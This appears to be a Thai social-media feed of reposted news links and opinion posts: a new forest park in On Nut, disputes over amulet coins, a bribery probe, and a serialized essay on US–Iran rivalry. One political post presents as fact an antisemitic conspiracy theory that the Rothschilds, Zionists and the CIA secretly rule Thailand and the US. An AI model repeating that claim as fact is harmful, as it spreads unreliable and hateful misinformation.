    'พรพรหม' สุดภูมิใจเผยภาพ Before-After 3 ปีผ่านมา จากกองขยะอ่อนนุช สู่ สวนป่า 60,000 ต้น กลายเป็นปอดใหญ่แห่งใหม่ของกรุงเทพฯ https://www.thai-tai.tv/news/21835/ . #ไทยไท #สวนป่าอ่อนนุช #พื้นที่สีเขียว #ปอดกรุงเทพ #พลิกโฉม #สิ่งแวดล้อม
    0 Comments 0 Shares 4 Views 0 Reviews
  • ระดับเหรียญหลวงปู่ ใครจะกล้าหาญลองดีทำเองโดยไม่ขออนุญาต ใครจัดทำ ต้องมีบันทึกทั้งหมดเพราะนั่นคือเกียรติประวัติดีงามแก่ชื่อเสียงวงศ์ตระกูลตนเองว่าได้รับความไว้วางใจ เชื่อใจจึงสามารถได้งานบุญใหญ่นี้แก่วงศ์ตระกูล ,ได้หน้าขนาดนั้น ใครๆก็อยากโชว์ตนเองล่ะ ถ้าเหรียญไม่มีบันทึก ไม่มีประวัติศาสตร์การจัดสร้าง ตีตกไปหมดล่ะ.

    https://youtube.com/watch?v=yjhbxby3pYU&si=N5oQqGK0Wpy4r3s2
    ระดับเหรียญหลวงปู่ ใครจะกล้าหาญลองดีทำเองโดยไม่ขออนุญาต ใครจัดทำ ต้องมีบันทึกทั้งหมดเพราะนั่นคือเกียรติประวัติดีงามแก่ชื่อเสียงวงศ์ตระกูลตนเองว่าได้รับความไว้วางใจ เชื่อใจจึงสามารถได้งานบุญใหญ่นี้แก่วงศ์ตระกูล ,ได้หน้าขนาดนั้น ใครๆก็อยากโชว์ตนเองล่ะ ถ้าเหรียญไม่มีบันทึก ไม่มีประวัติศาสตร์การจัดสร้าง ตีตกไปหมดล่ะ. https://youtube.com/watch?v=yjhbxby3pYU&si=N5oQqGK0Wpy4r3s2
    0 Comments 0 Shares 39 Views 0 Reviews
  • 555,ว่าแล้ว แปลกๆมากพวกนี้ มันเป็นขบวนการจริงๆ,ร่ำรวยผิดปกติด้วย โชว์บ้าน โชว์รถหรูสาระพัด อวดร่ำอวดรวย เหยียดคนอื่นด้วย,มีนายใหญ่คุ้มหัวแน่นอนจึงกล้าหาญ,นอมินีตัวโชว์ให้เป็นตัวเอกออกเดินหน้าโรง,เรียกเหยื่อ.,จิตใจคนเรามิอาจดูผิวเผินได้,สิ่งที่กายวาจาแสดงออกผ่านสื่ออาจอีกเรื่อง,ลับหลังก็อีกเรื่อง สตอรี่อีกไม่เอามารวมด้วยมากมายตรึม,คนเดอะแก๊งพวกนี้.

    ..โรงงานไม่ได้ผลิตรถ ไม่ได้ประกอบรถรุ่นนี้ ไม่มีบันทึกการสร้างรถรุ่นนี้ มันไปผลิตในโรงงานไหนว่ะ ,สิทธิบัตรใบอนุญาตการผลิตการสร้างโรงงานนี้ผูกขาดหลักอย่างเป็นทางการ,แม้มีผลิตจากโรงงานอื่นคือคู่แข่ง ก็ต้องบันทึก ปล.จดหมายเหตุไว้ของเหตุการณ์ที่เกิดรถรุ่นนี้ขึ้น,หรือบันทึกแสดงความเสียใจที่ตนไม่ได้งานการผลิตมาล่ะ ท้ายเล่มของรุ่นนี้ แล้วทางวัดต้องจัดงานปลุกเสกใหญ่โตให้เกียรติชื่อครูบาอาจารย์ที่จัดสร้างเหรียญ เพื่อศิริมงคลต่อเหรียญเองในรุ่นนั้นๆ,ทางวัดเองต้องให้อนุญาตโรงงานรถโรงงานผลิตเหรียญด้วยว่าสั่งสร้างเท่านั้นเท่านี้บันทึกส่งรถส่งเหรียญให้ใครจับจองด้วย,ตามรุ่นพิเศษอีก ราคาแพงที่ผลิตตอบสนองความต้องการพิเศษตามขั้นตอนกระบวนดารผลิตใครได้ก่อนหลังอีก.,ก่อนปี2508ยังมีบันทึกสาระพัดทั้งจากทางวัดเองและโรงปั้มรับมอบใบอนุญาตสร้าง,ถ้าจะสร้างเพิ่มสร้างเสริมผลิตเพิ่มผลิตเสริมต้องขออนุญาตวัดอีก,คณะกรรมการวัดต้องรับรู้ทั่วทั้งวัด เพราะมันคือชื่อเสียงเกียรติยศของครูบาอาจารย์และชื่อเสียงวัดด้วย,มิอาจปล่อยเลอะเทอะได้,อย่าลืมว่า พระวัดนี้อาจมีใครบรรลุธรรม สามารถหยั่งเห็นถึงเหตุที่เกิดขึ้นในอนาคตได้แบบปัจจุบันนี้ คณะท่านจึงมีแผนการรับมือไว้แล้วด้วย,โดยตัวแปลที่เห็นปัจจุบันคือ ตระกูลผู้สร้างรับงานทางวัดมาตลอด ไม่มีบันทึก ไม่มีประวัติสร้างพระรุ่นนี้เลย,จึงเป็นข้อสังเกตุใหญ่ที่สามารถตีตกได้,ทางหุ้น หากมีอะไรผิดปกติ ถูกแขวนถูกหยุดถูกห้ามทำการซื้อขายก่อนทันที,ต้องถูกตรวจสอบก่อนนั้นเอง,นี้อะไรมุ่งพานิชย์อย่างเดียว,คนออกมาปกป้องเขาก็ไม่ผิดหรอก,คนซื้อมาแล้ว ซื้อมาเองด้วยเงินตนเองจะ100ล้านก็เงินตนเองไม่ผิดหรอก,แต่อย่าบิดประเด็นคือร่วมกันตรวจสอบเหรียญ สืบหาว่าความจริงของเหรียญนี้ มันมีค่าจริงแบบใด ค่าเท็จแบบใดร่วมกันสร้างมาตราฐานพระเครื่องไทย,เหรียญพระมันต้องดูองค์ประกอบทั้งหมดร่วมกัน,เพราะปัจจุบันมันปลอมเหรียญกันง่ายๆมากเพราะเทคโนโลยีมันล้ำสมัยมาก,
    ..เอาประเด็นแค่โรงปั้มไม่ได้ผลิต ก็งานงอกงานเข้าแล้ว,มันเสริม มันเพิ่มมาจากไหน.,ยิ่งถ้าหากทางวัดบอกผ่านบันทึกแก่วัดเจ้าของเรื่องว่า..ไม่เคยอนุญาตใป้โรงงานโรงผลิตใดๆมาสร้างพระรุ่นนี้อีก ยิ่งจบเลย,

    ..วงการพระคือวิถีฟอกเงินที่ง่ายที่สุด,ไม่ต่างจากบ่อนคาสิโนจังหวัดตราดหรือตลอดพรมแดนไทยเรา ที่สามารถทำอะไรก็ได้ รวมทั้งฟอกเงินมหาศาลนั้นๆ

    https://youtube.com/watch?v=dn4AfTXrI5I&si=sMZVFYrP0HAYKwWV
    555,ว่าแล้ว แปลกๆมากพวกนี้ มันเป็นขบวนการจริงๆ,ร่ำรวยผิดปกติด้วย โชว์บ้าน โชว์รถหรูสาระพัด อวดร่ำอวดรวย เหยียดคนอื่นด้วย,มีนายใหญ่คุ้มหัวแน่นอนจึงกล้าหาญ,นอมินีตัวโชว์ให้เป็นตัวเอกออกเดินหน้าโรง,เรียกเหยื่อ.,จิตใจคนเรามิอาจดูผิวเผินได้,สิ่งที่กายวาจาแสดงออกผ่านสื่ออาจอีกเรื่อง,ลับหลังก็อีกเรื่อง สตอรี่อีกไม่เอามารวมด้วยมากมายตรึม,คนเดอะแก๊งพวกนี้. ..โรงงานไม่ได้ผลิตรถ ไม่ได้ประกอบรถรุ่นนี้ ไม่มีบันทึกการสร้างรถรุ่นนี้ มันไปผลิตในโรงงานไหนว่ะ ,สิทธิบัตรใบอนุญาตการผลิตการสร้างโรงงานนี้ผูกขาดหลักอย่างเป็นทางการ,แม้มีผลิตจากโรงงานอื่นคือคู่แข่ง ก็ต้องบันทึก ปล.จดหมายเหตุไว้ของเหตุการณ์ที่เกิดรถรุ่นนี้ขึ้น,หรือบันทึกแสดงความเสียใจที่ตนไม่ได้งานการผลิตมาล่ะ ท้ายเล่มของรุ่นนี้ แล้วทางวัดต้องจัดงานปลุกเสกใหญ่โตให้เกียรติชื่อครูบาอาจารย์ที่จัดสร้างเหรียญ เพื่อศิริมงคลต่อเหรียญเองในรุ่นนั้นๆ,ทางวัดเองต้องให้อนุญาตโรงงานรถโรงงานผลิตเหรียญด้วยว่าสั่งสร้างเท่านั้นเท่านี้บันทึกส่งรถส่งเหรียญให้ใครจับจองด้วย,ตามรุ่นพิเศษอีก ราคาแพงที่ผลิตตอบสนองความต้องการพิเศษตามขั้นตอนกระบวนดารผลิตใครได้ก่อนหลังอีก.,ก่อนปี2508ยังมีบันทึกสาระพัดทั้งจากทางวัดเองและโรงปั้มรับมอบใบอนุญาตสร้าง,ถ้าจะสร้างเพิ่มสร้างเสริมผลิตเพิ่มผลิตเสริมต้องขออนุญาตวัดอีก,คณะกรรมการวัดต้องรับรู้ทั่วทั้งวัด เพราะมันคือชื่อเสียงเกียรติยศของครูบาอาจารย์และชื่อเสียงวัดด้วย,มิอาจปล่อยเลอะเทอะได้,อย่าลืมว่า พระวัดนี้อาจมีใครบรรลุธรรม สามารถหยั่งเห็นถึงเหตุที่เกิดขึ้นในอนาคตได้แบบปัจจุบันนี้ คณะท่านจึงมีแผนการรับมือไว้แล้วด้วย,โดยตัวแปลที่เห็นปัจจุบันคือ ตระกูลผู้สร้างรับงานทางวัดมาตลอด ไม่มีบันทึก ไม่มีประวัติสร้างพระรุ่นนี้เลย,จึงเป็นข้อสังเกตุใหญ่ที่สามารถตีตกได้,ทางหุ้น หากมีอะไรผิดปกติ ถูกแขวนถูกหยุดถูกห้ามทำการซื้อขายก่อนทันที,ต้องถูกตรวจสอบก่อนนั้นเอง,นี้อะไรมุ่งพานิชย์อย่างเดียว,คนออกมาปกป้องเขาก็ไม่ผิดหรอก,คนซื้อมาแล้ว ซื้อมาเองด้วยเงินตนเองจะ100ล้านก็เงินตนเองไม่ผิดหรอก,แต่อย่าบิดประเด็นคือร่วมกันตรวจสอบเหรียญ สืบหาว่าความจริงของเหรียญนี้ มันมีค่าจริงแบบใด ค่าเท็จแบบใดร่วมกันสร้างมาตราฐานพระเครื่องไทย,เหรียญพระมันต้องดูองค์ประกอบทั้งหมดร่วมกัน,เพราะปัจจุบันมันปลอมเหรียญกันง่ายๆมากเพราะเทคโนโลยีมันล้ำสมัยมาก, ..เอาประเด็นแค่โรงปั้มไม่ได้ผลิต ก็งานงอกงานเข้าแล้ว,มันเสริม มันเพิ่มมาจากไหน.,ยิ่งถ้าหากทางวัดบอกผ่านบันทึกแก่วัดเจ้าของเรื่องว่า..ไม่เคยอนุญาตใป้โรงงานโรงผลิตใดๆมาสร้างพระรุ่นนี้อีก ยิ่งจบเลย, ..วงการพระคือวิถีฟอกเงินที่ง่ายที่สุด,ไม่ต่างจากบ่อนคาสิโนจังหวัดตราดหรือตลอดพรมแดนไทยเรา ที่สามารถทำอะไรก็ได้ รวมทั้งฟอกเงินมหาศาลนั้นๆ https://youtube.com/watch?v=dn4AfTXrI5I&si=sMZVFYrP0HAYKwWV
    0 Comments 0 Shares 56 Views 0 Reviews
  • ประเทศไทยเราจริงๆแล้วจะเจริญรุ่งเรืองกันนานแล้ว,เกิดจากพรรคภาคใต้นี้ล่ะตัวถ่วงความเจริญของชาติไทยที่แท้จริง,มักใหญ่ใฝ่สูงด้วย,แต่ยังดีที่ประชาชนคนไทยทางภาคใต้เหมือนกัน ตื่นรับรู้ความจริงมากเช่นกันด้วย รักบ้านรักเมืองมากกว่านักการเมืองภาคใต้ด้วย,ปชป.จึงดับอนาถของจริง ,mou43ก็คน ปชป.จากอดีตนายกฯ พรรค.ปชป.นี้จัดทำขึ้น,ประเทศไทยมีนายกฯจากพรรคปชป.นี้เอง ชาติไทยจึงถูกเตะตัดขาทางด้านความร่ำรวยมั่งคั่งสู่ประชาชนไปตลอดเวลา,และพรรคปชป.นี้ดูดีๆไม่ต่างจากพรรคเดโมแคตของอเมริกาเลย,ถูกปกครองโดยตระกูลรอธไชลด์นั้นละและหรือ13ตระกูลก็ว่า,ไทยก็แบบเดียวกัน,และชาติไทยเราจึงถูกปล้นชิงความร่ำรวยมั่งคั่งมาโดยตลอดจากการกำกับงานสร้างโดยไซออนิสต์ossหรือciaประจำภูมิภาคเอเชียอาเชียนเรานี้ด้วย,มันปกครองทั้งระบบปกครองประชาธิปไตยและคอมมิวนิสต์แบบจีน,พวกนี้มันส่งคนของมันไปปะปนควบคุมในอำนาจปกครองประเทศทั้งหมดได้,กฎหมายมากมายจึงออกมาบังคับควบคุมอิสระภาพประชาชนโดยส่วนใหญ่ยิ่งเผด็จการคอมมิวนิสต์ด้วยแล้วมันยิ่งชอบ,
    ..ทางเดียวจะจบตัดตอนมันได้ให้ชาติไทยเรารอดต้องเปลี่ยนระบบปกครองจากฝรั่งส่งให้เราใช้ปกครองเป็นเราสร้างทำขึ้นเองคือระบบปกครองแบบธรรมาธิปไตย อีนมีพระมหากษัตริย์ทรงเป็นพระประมุข เราจะทำลายฝ่ายมืดได้แน่นอน.

    https://youtube.com/watch?v=G31LnpOYHQI&si=18RVXHEqTsHcTnLO
    ประเทศไทยเราจริงๆแล้วจะเจริญรุ่งเรืองกันนานแล้ว,เกิดจากพรรคภาคใต้นี้ล่ะตัวถ่วงความเจริญของชาติไทยที่แท้จริง,มักใหญ่ใฝ่สูงด้วย,แต่ยังดีที่ประชาชนคนไทยทางภาคใต้เหมือนกัน ตื่นรับรู้ความจริงมากเช่นกันด้วย รักบ้านรักเมืองมากกว่านักการเมืองภาคใต้ด้วย,ปชป.จึงดับอนาถของจริง ,mou43ก็คน ปชป.จากอดีตนายกฯ พรรค.ปชป.นี้จัดทำขึ้น,ประเทศไทยมีนายกฯจากพรรคปชป.นี้เอง ชาติไทยจึงถูกเตะตัดขาทางด้านความร่ำรวยมั่งคั่งสู่ประชาชนไปตลอดเวลา,และพรรคปชป.นี้ดูดีๆไม่ต่างจากพรรคเดโมแคตของอเมริกาเลย,ถูกปกครองโดยตระกูลรอธไชลด์นั้นละและหรือ13ตระกูลก็ว่า,ไทยก็แบบเดียวกัน,และชาติไทยเราจึงถูกปล้นชิงความร่ำรวยมั่งคั่งมาโดยตลอดจากการกำกับงานสร้างโดยไซออนิสต์ossหรือciaประจำภูมิภาคเอเชียอาเชียนเรานี้ด้วย,มันปกครองทั้งระบบปกครองประชาธิปไตยและคอมมิวนิสต์แบบจีน,พวกนี้มันส่งคนของมันไปปะปนควบคุมในอำนาจปกครองประเทศทั้งหมดได้,กฎหมายมากมายจึงออกมาบังคับควบคุมอิสระภาพประชาชนโดยส่วนใหญ่ยิ่งเผด็จการคอมมิวนิสต์ด้วยแล้วมันยิ่งชอบ, ..ทางเดียวจะจบตัดตอนมันได้ให้ชาติไทยเรารอดต้องเปลี่ยนระบบปกครองจากฝรั่งส่งให้เราใช้ปกครองเป็นเราสร้างทำขึ้นเองคือระบบปกครองแบบธรรมาธิปไตย อีนมีพระมหากษัตริย์ทรงเป็นพระประมุข เราจะทำลายฝ่ายมืดได้แน่นอน. https://youtube.com/watch?v=G31LnpOYHQI&si=18RVXHEqTsHcTnLO
    0 Comments 0 Shares 70 Views 0 Reviews
  • กองปราบเตรียมออกหมายเรียกพยาน 3-4 ราย ชี้แจงข้อเท็จจริง ปมเสนอสินบน 40 ล้านให้ "ไชยชนก" แลกหยุดปราบแก๊งคอลเซ็นเตอร์ พร้อมส่งชุดสืบสวนตรวจสอบสถานที่นัดเจรจา

    อ่านต่อ..https://news1live.com/detail/9680000096784

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    กองปราบเตรียมออกหมายเรียกพยาน 3-4 ราย ชี้แจงข้อเท็จจริง ปมเสนอสินบน 40 ล้านให้ "ไชยชนก" แลกหยุดปราบแก๊งคอลเซ็นเตอร์ พร้อมส่งชุดสืบสวนตรวจสอบสถานที่นัดเจรจา อ่านต่อ..https://news1live.com/detail/9680000096784 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    5
    0 Comments 0 Shares 196 Views 0 Reviews
  • เหยื่อติดคอ ตอนที่ 8
    นิทานเรื่องจริง เรื่อง “เหยื่อติดคอ”
    ตอนที่ 8 (ตอนจบ)

    ตั้งแต่อเมริกาบีบให้สหประชาชาติคว่ำบาตรอิหร่าน ตั้งแต่ปี ค.ศ.2006 อิหร่านก็เปิดประตูรับแขกตะวันตกน้อยลง โดยเฉพาะสัญชาติอเมริกัน สมน้ำหน้า ! เขาไม่รับให้เข้าไปเดินเล่นในประเทศ แล้วคุยผ่านคนกลาง มันจะน่าเชื่อถือได้มากหรือน้อย อิหร่านทำตัวต่างกับสมันน้อย ที่เปิดมันหมดทั้งประตูหน้า ประตูหลัง หน้าต่างมีกี่บานเปิดถ่างมันหมด ข้อมูลทุกอย่างก็ไหลเหมือนท่อแตก ทำให้การวางแผนควบคุม (ไม่อยากใช้คำว่า เขมือบหรือขม้ำ มันแสลงใจกัน) สมันน้อย จึงเหมือนแค่ปลอกกล้วยให้ลิงกิน

    ตั้งแต่รบกับอินเดียนแดงชนะ ได้แผ่นดินเขามาครอง อเมริกาเคยรบข้าศึก หรือ ศัตรูในประเทศตัวเองบ้างไหม คำตอบคือไม่เคยเลย เคยแต่รบกันเอง เดินดาหน้าเป็นแถว ยิงปืนใส่กัน สมัยสงครามกลางเมืองเหนือใต้หลายร้อยปีมาแล้ว นอกนั้นอเมริการบนอกบ้านทั้งสิ้น แล้วการรบของอเมริกาที่นอกบ้านเป็นอย่างไร ที่เกาหลี เวียตนาม อาฟกานีสถาน และอิรัก รวมทั้งหลายแห่งในอาฟริกา ล้วนเป็นการรบกับประเทศที่ด้อยกว่าทั้งด้านอาวุธและฝีมือ อเมริกาใช้เวลา อาวุธ และกำลังพล เหมือนขี่ช้างไปจับตั๊กแตน และผลลัพธ์ ถ้าไม่แพ้น๊อกเช่นที่เวียตนาม ก็แพ้คะแนนในการรบทุกแห่ง ยกเว้นอาฟริกา ที่เหมือนรบกับคนใกล้ตาย อันนี้เป็นคำกล่าวของนายทหารอเมริกันเอง แล้วอิหร่านเป็นตั๊กแตนแน่หรือ ถ้าเป็นตั๊กแตน ก็ตั๊กแตนติดนิวเคลียร์ ดูเอาจากรายงานของคณะทำงานฉบับวันที่ 18 สิงหาคม ค.ศ.2006 ก็คงจะพอเดากันออก

    อเมริกาที่ใครๆคิดว่าแน่ คิดว่าใหญ่ เป็นพี่เบิ้มครองโลกหมายเลขหนึ่ง ดูเหมือนจะเก่งทางสร้างภาพผ่านสื่อ เอะอะก็ขู่จะเอากองทัพไปถล่มเขา เห็นลมพัดใบตองแห้งเป็นไม่ได้ ต้องออกเสียง แต่ก็ยังมีหลายคนในแดนสมันน้อย ที่กลัวพี่เบิ้มใบตองแห้ง จนไม่กล้าขยับหนี คงเพราะถูกครอบด้วยกระป๋องสี่เหลี่ยมติดตายอยู่ที่หัว หรืออิ่มจนพูดไม่ออก เฮ้อ! เหนื่อยใจ! ไม่เบื่อกระป๋องสี่เหลี่ยม คิดถอดออกบ้างหรือไงครับ…!?

    ถึงอิหร่านจะถูกจับเป็นเหยื่อ มาเป็นเวลานานกว่า 100 ปี แต่ไม่ได้หม่ายความว่า เมื่อตกเป็นเหยื่อแล้ว จะต้องเป็นเหยื่อเขาไปตลอดกาล เหยื่อที่อ่อนแอเท่านั้นที่คิดเช่นนั้น อิหร่านบอกว่าข้อเสนอของคาวบอย Bush เมื่อกลางปี ค.ศ.2006 เหมือนกับให้รัฐบาลอิหร่านไปเลียเกือกบู๊ทของ Bush ต่อหน้าสาธารณะ และเป็นการจบสิ้นศักดิ์ศรีทางการ เมืองของอิหร่าน “ Bush might as well have offered the Iranian regime a chance to lick his boots in public and commit political suicide…”

    เดือนตุลาคม ค.ศ.2007 คุณพี่ปูตินทำให้โลกอ้าปากค้าง มองตาไม่กระพริบ คุณพี่เดินทางไปอิหร่านอย่างเป็นทางการในฐานะหัวหน้ารัฐบาลของรัสเซีย หลังจากรัสเซียไม่ได้ไปเยี่ยมเยือนอิหร่านมา 60 ปี คุณพี่ประกาศในการไปเยี่ยมอิหร่านว่า รัสเซียจะปกป้องอิหร่านจากการคุกคามของอเมริกา เหมือนเป็นทางการเตือนผ่านไปในอากาศ ข้ามทวีปไปถึงคาวบอย Bush ว่า “โปรดระวัง” เตือนมา 7 ปีมาแล้ว การเตือนนี้จะยังมีผลอยู่หรือไม่ น่าติดตาม

    เสียงเตือนของคุณพี่ปูติน ถูกแปลงเป็นการเร่งเครื่อง คาวบอยอเมริกันเหมือนถูกหยามหน้า Pentagon รายงานว่า มีการหารือกันถึงการวางแผนจะให้ของขวัญอิหร่าน จะเอาแบบ “a broad bombing attack” ทิ้งระเบิดแบบปูพรมทั่วไปทั้งเตหะราน หรือเอาแบบ “surgical” ส่งให้เฉพาะกองทัพของอิหร่านดีนะ เรือรบจำนวนกว่าครึ่งของกองทัพเรืออเมริกา ถูกสั่งให้พร้อมเคลื่อนที่ประชิดอิหร่าน หน่วยงานความมั่นคงของอเมริกา National Security Strategy ออกข่าวในเดือนกันยายน ค.ศ. 2006 ว่า “เราอาจจะไม่เคยเจอประเทศใดเพียงประเทศเดียว ที่ท้าทายเราได้มากเท่าอิหร่าน !” เป็นคำพูดที่น่ากลัวมาก จากหน่วยงานความมั่นคง ของนักล่าใบตองแห้ง
    เจ้าหน้าที่อเมริกันบันทึกว่า การแข่งขันระหว่างอเมริกา รัสเซีย ได้เริ่มต้นใหม่อีกแล้ว การแข่งขันนี้ไม่ใช่แค่เรื่องนิวเคลียร์ของอิหร่าน แต่มันเป็นการแข่งขันชิงตำแหน่ง แชมป์โลก ทั้งทางด้านเศรษฐกิจ การเมือง และการทหารในตะวันออกกลาง และเลยไปกว่านั้น แต่นับจากวันนั้นถึงวันนี้ มันก็มีแต่การคว่ำบาตรกับการส่งเสียงใส่ใบตองแห้ง พี่เบิ้มอเมริกายังไม่ขยับเข้าไปใกล้เหยื่อชื่ออิหร่านมากกว่านั้น ยังปล่อยให้คาคออยู่อย่างนั้น

    จะเป็นพี่เบิ้มหมายเลขหนึ่งของโลก ต้องมีอุปกรณ์พร้อมอย่างน้อย 3 อย่าง อาวุธหนัก ทุนหนา และน้ำมันแน่น (ถัง) มันเป็นส่วนผสมที่เสริมสร้างกันเอง ดังนั้นอเมริกาต้อง “ได้” ตะวันออกกลาง ที่มีแหล่งน้ำมันกว่าครึ่งของโลก แต่จะได้ตะวันออกกลางอยู่ในมือเบ็ดเสร็จ ต้องจัดการเอาซาอุดิอารเบีย และอิหร่าน 2 ประเทศใหญ่ของตะวันออกกลาง มาอยู่ในกรงเลี้ยงให้เชื่อง

    ซาอุดิอารเบียติดอาหารยี่ห้อกระดาษสีเขียวตรานกอินทรีย์จนอิ่มแปร้ เกาะนิ่ง แม้บางครั้งจะออกอาการกระสับกระส่าย แต่ไม่ออกฤทธิ์ ตรงกันข้ามกับเหยื่อชื่ออิหร่าน

    อิหร่านดิ้นรน ออกแรง เพื่อให้หลุดจากกรงเหยื่อมานาน และอเมริกาก็ใช้สารพัดกับดัก ไม้เสี้ยม ไม้เสียบเพื่อให้เหยื่อเชื่องอยู่มือ อเมริกาคิดว่าเหยื่อทุกรายในตะวัน ออกกลาง (และดูเหมือนจะทั้งโลก !) จะชอบอาหารยี่ห้อเดียวกัน อาจจะใช่ แต่ไม่แน่ว่าจะเสมอไป และตลอดไป เมื่อหมดหนทางทำให้เหยื่อเชื่อง อเมริกาก็ตัดสินใจทำลายเหยื่ออย่างเหี้ยมโหด

    อิหร่านไม่หวังจะเป็นเหยื่อตลอดกาล แต่จะสู้โดยลำพัง ไม่แน่ว่าจะหลุดจากกรงได้ อิหร่านรู้จักสร้างแนวร่วม อิรัก เลบานอน และซีเรีย ซึ่งค่อยๆย้ายที่มายืนแถวเดียวกับอิหร่าน แต่ที่สำคัญ อิหร่านรู้จักแยกว่าใครคือเพื่อน และใครคือศัตรู

    สำหรับรัสเซียและจีน เพื่อไม่ให้อเมริกาครอบครองตะวันออกกลางทั้งหมด ซึ่งจะทำให้ทั้งรัสเซียและจีนเสียเปรียบ และอาจจะถึงเสียหาย จึงมีแต่จะต้องสนันสนุนอิหร่านให้เข้มแข็ง ให้เป็นไม้ขวางที่หนักและเคลื่อนย้ายยาก เหมือนท่อนซุงขวางทาง ไม่ให้อเมริกาก้าวครอบตะวันออก กลางทั้งหมดได้ง่ายๆ ยิ่งบวกอิรัก ซีเรีย และเลบานอน เข้าไปด้วย 4 ประเทศ รวมเป็นเสี้ยวพระจันทร์ อเมริกาเห็นแล้วก็คงหนาว ขบวนการเข้าไปในอิรัก ฉายหนังโหดซ้ำซากรอบหลังนี้ และการทำลายซีเรีย ซึ่งไม่น่าต้องถามว่าฝีมือใคร

    นับตั้งแต่คุณพี่ปูติน เดินเข้าไปจับมือกับอิหร่านเมื่อ 7 ปี ที่แล้ว สัมพันธ์ระหว่างรัสเซียกับอิหร่าน รวมทั้งจีน ดูเหมือนยิ่งกระชับและชิดแน่น การสนับสนุนร่วมมือระหว่าง 3 ประเทศ มีทั้งเปิดเผยและปิดลับ มันเป็นการเปิดทางให้เหยื่อก้าวย่างออกจากกรงอย่างเด็ดเดี่ยวและมั่นใจ

    อิหร่านถูกเหล่านักล่าตะวันตก ขูดเลือดเอาน้ำมันมากว่า 70 ปี จนถึงทุกวันนี้ก็ยังถูกขูดอยู่ ผ่านสงครามโลกมา 2 ครั้ง ก็ยังถูกหลอก ถูกย่ำยี จนศักดิ์ศรีของประเทศและประชาชนกร่อนแห้ง จากถูกอังกฤษขูดเลือด มาถูกอเมริกาเลาะเนื้อเถือกระดูกต่อ คนอิหร่านยอมลำบาก แต่ไม่ยอมก้มหัวเป็นเหยื่ออีกต่อไป

    เมื่อเหยื่อรายสำคัญ ตัดสินใจเลือกเดินออกจากกรง อเมริกาจะปล่อยมือ เปิดกรงให้ง่ายๆเช่นนั้นหรือ อเมริกาน่าจะคิดหนัก แต่ดูเหมือนเสียง “โปรดระวัง” ของคุณพี่ปูตินจะลอยลมมาผ่านข้ามไปอีกฟากหนึ่งของโลก..….ให้อเมริกาได้ยิน…..อีกรอบหนึ่ง

    สวัสดีครับ
    คนเล่านิทาน
    25 กันยายน 2557
    เหยื่อติดคอ ตอนที่ 8 นิทานเรื่องจริง เรื่อง “เหยื่อติดคอ” ตอนที่ 8 (ตอนจบ) ตั้งแต่อเมริกาบีบให้สหประชาชาติคว่ำบาตรอิหร่าน ตั้งแต่ปี ค.ศ.2006 อิหร่านก็เปิดประตูรับแขกตะวันตกน้อยลง โดยเฉพาะสัญชาติอเมริกัน สมน้ำหน้า ! เขาไม่รับให้เข้าไปเดินเล่นในประเทศ แล้วคุยผ่านคนกลาง มันจะน่าเชื่อถือได้มากหรือน้อย อิหร่านทำตัวต่างกับสมันน้อย ที่เปิดมันหมดทั้งประตูหน้า ประตูหลัง หน้าต่างมีกี่บานเปิดถ่างมันหมด ข้อมูลทุกอย่างก็ไหลเหมือนท่อแตก ทำให้การวางแผนควบคุม (ไม่อยากใช้คำว่า เขมือบหรือขม้ำ มันแสลงใจกัน) สมันน้อย จึงเหมือนแค่ปลอกกล้วยให้ลิงกิน ตั้งแต่รบกับอินเดียนแดงชนะ ได้แผ่นดินเขามาครอง อเมริกาเคยรบข้าศึก หรือ ศัตรูในประเทศตัวเองบ้างไหม คำตอบคือไม่เคยเลย เคยแต่รบกันเอง เดินดาหน้าเป็นแถว ยิงปืนใส่กัน สมัยสงครามกลางเมืองเหนือใต้หลายร้อยปีมาแล้ว นอกนั้นอเมริการบนอกบ้านทั้งสิ้น แล้วการรบของอเมริกาที่นอกบ้านเป็นอย่างไร ที่เกาหลี เวียตนาม อาฟกานีสถาน และอิรัก รวมทั้งหลายแห่งในอาฟริกา ล้วนเป็นการรบกับประเทศที่ด้อยกว่าทั้งด้านอาวุธและฝีมือ อเมริกาใช้เวลา อาวุธ และกำลังพล เหมือนขี่ช้างไปจับตั๊กแตน และผลลัพธ์ ถ้าไม่แพ้น๊อกเช่นที่เวียตนาม ก็แพ้คะแนนในการรบทุกแห่ง ยกเว้นอาฟริกา ที่เหมือนรบกับคนใกล้ตาย อันนี้เป็นคำกล่าวของนายทหารอเมริกันเอง แล้วอิหร่านเป็นตั๊กแตนแน่หรือ ถ้าเป็นตั๊กแตน ก็ตั๊กแตนติดนิวเคลียร์ ดูเอาจากรายงานของคณะทำงานฉบับวันที่ 18 สิงหาคม ค.ศ.2006 ก็คงจะพอเดากันออก อเมริกาที่ใครๆคิดว่าแน่ คิดว่าใหญ่ เป็นพี่เบิ้มครองโลกหมายเลขหนึ่ง ดูเหมือนจะเก่งทางสร้างภาพผ่านสื่อ เอะอะก็ขู่จะเอากองทัพไปถล่มเขา เห็นลมพัดใบตองแห้งเป็นไม่ได้ ต้องออกเสียง แต่ก็ยังมีหลายคนในแดนสมันน้อย ที่กลัวพี่เบิ้มใบตองแห้ง จนไม่กล้าขยับหนี คงเพราะถูกครอบด้วยกระป๋องสี่เหลี่ยมติดตายอยู่ที่หัว หรืออิ่มจนพูดไม่ออก เฮ้อ! เหนื่อยใจ! ไม่เบื่อกระป๋องสี่เหลี่ยม คิดถอดออกบ้างหรือไงครับ…!? ถึงอิหร่านจะถูกจับเป็นเหยื่อ มาเป็นเวลานานกว่า 100 ปี แต่ไม่ได้หม่ายความว่า เมื่อตกเป็นเหยื่อแล้ว จะต้องเป็นเหยื่อเขาไปตลอดกาล เหยื่อที่อ่อนแอเท่านั้นที่คิดเช่นนั้น อิหร่านบอกว่าข้อเสนอของคาวบอย Bush เมื่อกลางปี ค.ศ.2006 เหมือนกับให้รัฐบาลอิหร่านไปเลียเกือกบู๊ทของ Bush ต่อหน้าสาธารณะ และเป็นการจบสิ้นศักดิ์ศรีทางการ เมืองของอิหร่าน “ Bush might as well have offered the Iranian regime a chance to lick his boots in public and commit political suicide…” เดือนตุลาคม ค.ศ.2007 